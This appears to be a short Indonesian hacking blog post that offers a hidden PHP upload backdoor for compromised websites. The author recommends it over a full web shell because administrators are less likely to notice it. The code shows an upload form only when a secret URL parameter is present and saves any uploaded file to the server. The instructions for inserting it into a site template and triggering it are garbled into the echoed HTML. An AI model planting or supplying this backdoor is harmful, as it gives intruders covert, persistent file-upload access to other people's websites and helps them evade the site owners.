Haxor-Aspra langsung saja , dengan tanam shell di website mungkin akan menjadi bug atau bisa di tau admin , tapi dengan cara menggunakan file upload tersembunyi ini akan mengurangi resiko tersebut
<?php if(isset($_GET['marinecyber.com'])){echo "<body bgcolor=black>agan edit templates website tersebut dan agan sisipkan script file upload tersebut di atas script file yang agan edit. lalu eksekusi nya yaitu site.com/namafile.php?marinecyber.com
<font color=cyan size=3>";echo "<h2>Uploaded Area</h2><hr>"; echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\"><label for=\"file\">Filename:</label><input type=\"file\" name=\"file\" id=\"file\" /><br /><input type=\"submit\" name=\"submit\" value=\"UPLOAD IT\"></form>";if ($_FILES["file"]["error"] > 0) { echo "Error: " . $_FILES["file"]["error"] . "<br />"; }else { echo "Upload: " . $_FILES["file"]["name"] . "<br />"; echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />"; echo "Stored in: " . $_FILES["file"]["tmp_name"]; }if (file_exists("" . $_FILES["file"]["name"])) { echo $_FILES["file"]["name"] . " already exists. "; } else { move_uploaded_file($_FILES["file"]["tmp_name"], "" . $_FILES["file"]["name"]); echo "Stored in: " . "" . $_FILES["file"]["name"];echo"<hr>"; } }
?>
Sumber